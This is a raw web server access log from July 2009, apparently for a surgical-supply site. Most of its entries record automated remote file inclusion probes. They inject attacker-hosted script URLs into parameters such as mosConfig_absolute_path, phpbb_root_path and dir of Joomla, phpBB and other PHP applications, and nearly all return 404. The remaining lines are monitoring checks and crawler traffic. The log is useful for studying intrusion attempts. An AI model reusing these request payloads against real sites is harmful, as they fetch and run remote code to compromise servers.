93.190.41.97 - - [28/Jul/2009:04:20:59 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
93.190.41.97 - - [28/Jul/2009:04:20:59 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.190.41.97 - - [28/Jul/2009:04:21:44 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.143.98.5 - - [28/Jul/2009:04:21:58 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
123.143.98.5 - - [28/Jul/2009:04:21:58 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
123.143.98.5 - - [28/Jul/2009:04:21:58 -0400] "GET /logs/access_log.Q109063000/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
87.106.210.178 - - [28/Jul/2009:04:22:48 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
87.106.210.178 - - [28/Jul/2009:04:22:48 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
93.190.41.97 - - [28/Jul/2009:04:23:03 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:04:23:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.118.82.22 - - [28/Jul/2009:04:24:22 -0400] "GET /logs/access_log.Q109070600/index.php?pagina=http://www.streetgangs.com/wp-content/themes/3bgs-id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
64.118.82.22 - - [28/Jul/2009:04:24:22 -0400] "GET /index.php?pagina=http://www.streetgangs.com/wp-content/themes/3bgs-id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
64.118.82.22 - - [28/Jul/2009:04:24:23 -0400] "GET /logs/index.php?pagina=http://www.streetgangs.com/wp-content/themes/3bgs-id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
123.143.98.5 - - [28/Jul/2009:04:24:53 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/id.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
123.143.98.5 - - [28/Jul/2009:04:24:53 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
123.143.98.5 - - [28/Jul/2009:04:24:53 -0400] "GET /logs/access_log.Q109063000/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
89.108.67.236 - - [28/Jul/2009:04:25:10 -0400] "GET /logs/access_log.Q109061200//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.812"
64.118.82.22 - - [28/Jul/2009:04:25:12 -0400] "GET /logs/access_log.Q109070600/index.php?pagina=http://www.streetgangs.com/wp-content/themes/3bgs-id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
64.118.82.22 - - [28/Jul/2009:04:25:12 -0400] "GET /index.php?pagina=http://www.streetgangs.com/wp-content/themes/3bgs-id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
64.118.82.22 - - [28/Jul/2009:04:25:12 -0400] "GET /logs/index.php?pagina=http://www.streetgangs.com/wp-content/themes/3bgs-id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
64.118.82.22 - - [28/Jul/2009:04:25:30 -0400] "GET /logs/error_log.Q109060700/index.php?pagina=http://www.streetgangs.com/wp-content/themes/3bgs-id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
64.118.82.22 - - [28/Jul/2009:04:26:17 -0400] "GET /logs/error_log.Q109060700/index.php?pagina=http://www.streetgangs.com/wp-content/themes/3bgs-id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
74.6.22.169 - - [28/Jul/2009:04:27:51 -0400] "GET /images/ACE_BoneTacking.pdf HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.191.35.118 - - [28/Jul/2009:04:28:00 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
91.191.35.118 - - [28/Jul/2009:04:28:01 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
91.191.35.118 - - [28/Jul/2009:04:28:01 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2009:04:28:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [28/Jul/2009:04:29:07 -0400] "GET /logs/error_log.Q109063000/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
94.75.245.36 - - [28/Jul/2009:04:30:39 -0400] "GET /logs/access_log.Q109061100//components/com_virtuemart/errors.php?error=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 262 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:04:30:39 -0400] "GET //components/com_virtuemart/errors.php?error=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:04:30:40 -0400] "GET /logs//components/com_virtuemart/errors.php?error=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 240 "-" "libwww-perl/5.823"
74.6.22.169 - - [28/Jul/2009:04:30:38 -0400] "GET /logs/error_log.Q109052000 HTTP/1.0" 200 3154855 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.169 - - [28/Jul/2009:04:30:44 -0400] "GET /logs/error_log.Q109052000 HTTP/1.0" 200 3154855 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.169 - - [28/Jul/2009:04:31:05 -0400] "GET /logs/access_log.Q109053100 HTTP/1.0" 200 1986553 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.169 - - [28/Jul/2009:04:31:24 -0400] "GET /images/ACE_tutor_2Stage_Ridge.pdf HTTP/1.0" 200 1581415 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [28/Jul/2009:04:33:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.191.35.118 - - [28/Jul/2009:04:35:15 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
94.75.245.36 - - [28/Jul/2009:04:35:34 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 276 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:04:35:34 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 249 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:04:35:34 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 254 "-" "libwww-perl/5.823"
217.107.219.30 - - [28/Jul/2009:04:35:46 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
217.107.219.30 - - [28/Jul/2009:04:35:46 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
217.107.219.30 - - [28/Jul/2009:04:35:46 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
38.108.180.166 - - [28/Jul/2009:04:36:35 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
38.108.180.166 - - [28/Jul/2009:04:36:37 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0 HTTP/1.1" 200 56584 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
94.75.245.36 - - [28/Jul/2009:04:36:56 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 276 "-" "libwww-perl/5.823"
217.107.219.30 - - [28/Jul/2009:04:37:16 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2009:04:38:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.191.35.118 - - [28/Jul/2009:04:38:34 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
91.191.35.118 - - [28/Jul/2009:04:38:35 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
91.191.35.118 - - [28/Jul/2009:04:38:35 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
91.191.35.118 - - [28/Jul/2009:04:41:19 -0400] "GET /logs/access_log.Q109062900/scanhttp://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
91.191.35.118 - - [28/Jul/2009:04:41:20 -0400] "GET /scanhttp://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
91.191.35.118 - - [28/Jul/2009:04:41:21 -0400] "GET /logs/scanhttp://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
66.249.71.204 - - [28/Jul/2009:04:43:13 -0400] "GET /images/over-index12_exhex.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
209.59.12.99 - - [28/Jul/2009:04:43:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.191.35.118 - - [28/Jul/2009:04:44:14 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
91.191.35.118 - - [28/Jul/2009:04:44:15 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
91.191.35.118 - - [28/Jul/2009:04:44:16 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
94.75.245.36 - - [28/Jul/2009:04:44:47 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 276 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:04:44:47 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 249 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:04:44:47 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 254 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:04:46:09 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 276 "-" "libwww-perl/5.823"
91.191.35.118 - - [28/Jul/2009:04:46:47 -0400] "GET /scanhttp://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
91.191.35.118 - - [28/Jul/2009:04:47:56 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2009:04:48:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.191.35.118 - - [28/Jul/2009:04:48:30 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
218.150.78.235 - - [28/Jul/2009:04:49:00 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.150.78.235 - - [28/Jul/2009:04:49:00 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.150.78.235 - - [28/Jul/2009:04:49:00 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.150.78.235 - - [28/Jul/2009:04:49:25 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.191.35.118 - - [28/Jul/2009:04:50:34 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
74.6.22.169 - - [28/Jul/2009:04:52:55 -0400] "GET /logs/access_log.Q107081100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [28/Jul/2009:04:54:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.191.35.118 - - [28/Jul/2009:04:54:35 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.32.185.24 - - [28/Jul/2009:04:56:24 -0400] "GET ///vwar/backup/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:04:56:24 -0400] "GET /logs/access_log.Q109061000%20%20///vwar/backup/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:04:56:24 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:04:56:43 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.191.35.118 - - [28/Jul/2009:04:58:24 -0400] "GET /logs/access_log.Q109053100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
72.32.185.24 - - [28/Jul/2009:04:58:30 -0400] "GET //?path%5Bdocroot%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:04:58:30 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:04:58:30 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 11339 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:04:58:31 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.38.243.71 - - [28/Jul/2009:04:58:48 -0400] "GET //include/write.php?dir=http://lawboards.semanticrestructuring.com//images/smile/1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.38.243.71 - - [28/Jul/2009:04:58:51 -0400] "GET /logs//include/write.php?dir=http://lawboards.semanticrestructuring.com//images/smile/1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.38.243.71 - - [28/Jul/2009:04:58:52 -0400] "GET /logs/access_log.Q109063000//include/write.php?dir=http://lawboards.semanticrestructuring.com//images/smile/1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.55.105.240 - - [28/Jul/2009:04:59:53 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.240 - - [28/Jul/2009:04:59:56 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64809 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
195.190.166.41 - - [28/Jul/2009:05:00:06 -0400] "GET /logs/access_log.Q109052200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.blendcolours.com/components/com_user/views/user/tmpl/r0x-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.106.210.178 - - [28/Jul/2009:05:00:42 -0400] "GET //index.php?option=com_custompages&cpage=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.106.210.178 - - [28/Jul/2009:05:00:42 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.210.178 - - [28/Jul/2009:05:00:42 -0400] "GET /logs/access_log.Q109051400%20%20//index.php?option=com_custompages&cpage=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:05:00:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.32.185.24 - - [28/Jul/2009:05:00:45 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.106.210.178 - - [28/Jul/2009:05:00:49 -0400] "GET /logs/access_log.Q109051100%20%20//index.php?option=com_custompages&cpage=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:05:00:51 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
93.190.41.97 - - [28/Jul/2009:05:01:26 -0400] "GET //index.php?option=com_custompages&cpage=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.41.97 - - [28/Jul/2009:05:01:26 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_custompages&cpage=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
93.190.41.97 - - [28/Jul/2009:05:01:26 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.190.41.97 - - [28/Jul/2009:05:01:31 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_custompages&cpage=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
93.107.195.43 - - [28/Jul/2009:05:01:45 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
93.107.195.43 - - [28/Jul/2009:05:01:45 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
93.107.195.43 - - [28/Jul/2009:05:01:50 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
93.107.195.43 - - [28/Jul/2009:05:01:50 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.106.210.178 - - [28/Jul/2009:05:02:12 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_custompages&cpage=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.210.178 - - [28/Jul/2009:05:02:21 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_custompages&cpage=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
93.190.41.97 - - [28/Jul/2009:05:02:41 -0400] "GET /logs/access_log.Q109051400%20%20//index.php?option=com_custompages&cpage=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
93.190.41.97 - - [28/Jul/2009:05:02:41 -0400] "GET /logs/access_log.Q109051100%20%20//index.php?option=com_custompages&cpage=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.75.245.36 - - [28/Jul/2009:05:03:52 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:05:03:52 -0400] "GET /index.php?pag=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 207 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:05:03:52 -0400] "GET /logs/index.php?pag=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 212 "-" "libwww-perl/5.823"
66.46.177.182 - - [28/Jul/2009:05:05:10 -0400] "GET /logs/access_log.Q109052400//includes/functions_admin.php?phpbb_root_path=http://ora.by/language/perkosa.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
66.46.177.182 - - [28/Jul/2009:05:05:10 -0400] "GET /logs//includes/functions_admin.php?phpbb_root_path=http://ora.by/language/perkosa.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
123.143.98.5 - - [28/Jul/2009:05:05:10 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
123.143.98.5 - - [28/Jul/2009:05:05:10 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
66.46.177.182 - - [28/Jul/2009:05:05:10 -0400] "GET //includes/functions_admin.php?phpbb_root_path=http://ora.by/language/perkosa.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
123.143.98.5 - - [28/Jul/2009:05:05:11 -0400] "GET /logs/access_log.Q109063000/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
66.46.177.182 - - [28/Jul/2009:05:05:15 -0400] "GET /logs//includes/functions_admin.php?phpbb_root_path=http://ora.by/language/perkosa.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
66.46.177.182 - - [28/Jul/2009:05:05:15 -0400] "GET //includes/functions_admin.php?phpbb_root_path=http://ora.by/language/perkosa.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
66.46.177.182 - - [28/Jul/2009:05:05:15 -0400] "GET /logs/access_log.Q109052400//includes/functions_admin.php?phpbb_root_path=http://ora.by/language/perkosa.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
72.32.185.24 - - [28/Jul/2009:05:05:23 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:05:05:26 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.46.177.182 - - [28/Jul/2009:05:05:29 -0400] "GET /logs/error_log.Q109052400//includes/functions_admin.php?phpbb_root_path=http://ora.by/language/perkosa.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
66.46.177.182 - - [28/Jul/2009:05:05:33 -0400] "GET /logs/error_log.Q109052400//includes/functions_admin.php?phpbb_root_path=http://ora.by/language/perkosa.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
209.59.12.99 - - [28/Jul/2009:05:05:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [28/Jul/2009:05:06:08 -0400] "GET /logs/error_log.Q109063000/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
